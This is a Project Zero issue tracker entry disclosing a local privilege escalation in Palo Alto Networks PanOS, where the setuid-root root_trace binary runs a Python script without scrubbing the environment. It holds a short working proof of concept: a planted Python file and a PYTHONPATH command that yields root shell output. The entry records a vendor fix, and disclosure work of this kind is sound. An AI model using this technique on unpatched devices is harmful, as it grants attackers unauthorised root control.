912 - Palo Alto Networks PanOS: root_trace local privilege escalation - project-zero

Starred by 1 user

Status:	Fixed
Owner:	taviso@google.com
Closed:	Nov 2016
Cc:	project-...@google.com
Deadline-90 Finder-taviso CCProjectZeroMembers Severity-High Vendor-PaloAltoNetworks Product-PanOS Reported-2016-Aug-23

Palo Alto Networks PanOS: root_trace local privilege escalation

Project Member Reported by taviso@google.com, Aug 23 2016

Back to list

The setuid root executable /usr/local/bin/root_trace essentially just does setuid(0) then system("/usr/local/bin/masterd"), which is a python script:

$ ls -l /usr/local/bin/root_trace 
-rwsr-xr-x 1 root root 12376 Oct 17  2014 /usr/local/bin/root_trace

As the environment is not scrubbed, you can just do something like this:

$ cat /tmp/sysd.py
import os
os.system("id")
os._exit(0);
$ PYTHONPATH=/tmp root_trace
uid=0(root) gid=502(admin) groups=501(noradgrp),502(admin)

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.

Project Member Comment 1 by taviso@google.com, Nov 18 2016

Labels: -Restrict-View-Commit
Status: Fixed

This was fixed by PAN today

http://securityadvisories.paloaltonetworks.com/Home/Detail/67

► Sign in to add a comment